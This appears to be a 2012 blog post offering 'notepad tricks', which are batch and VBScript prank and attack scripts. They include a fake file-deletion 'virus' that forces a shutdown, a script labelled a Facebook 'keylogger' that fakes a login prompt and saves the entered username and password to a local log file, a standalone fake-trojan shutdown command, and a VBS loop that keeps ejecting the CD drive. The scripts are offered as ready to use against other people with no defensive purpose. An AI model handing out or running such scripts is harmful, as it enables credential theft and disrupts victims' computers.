Tuesday 9 October 2012

notepad at its best ;)

i am back with some new tricks. these are simple and full of fun and if used correctly can be lethal too..........Long live notepad!!!



 A fake virus that makes user think alll files are being deleted

)@echo off
echo WARNING CPU HAS DETECTED A THREAT TO THE SYSTEM
pause
echo ATTEMPTING TO RESTORE BY DELETEING
pause
echo DELETEING ALL FILES!!
pause
shutdown -s -t 30 -c "deleting"
:hack
echo file:2323#@$
echo file:32433$$%%
echo file:#$@#$!53
echo file:#$35323
echo file:24@#$%2
goto hack

This one is a special treat


 keylogger for a facebook

@echo off
color 9
title Login
cls
echo Please Enter Email Adress And Password.
echo Contact FacebookStaff@yahoo.com
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Website Blocks Prevented Operation
pause >n
echo Username="%user%" Password="%pass%" >Log.txt
start >>Program Here<<
exit

hmmmm.....this is the funniest one to be true


simple fake shutdown virus

shutdown -s -t 30 -c "WARNING TROJAN DETECTED"

this one is nasty.......
 code to make cd drive open repeatedly (save as .vbs)

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

0 comments:

Post a Comment

waddya think?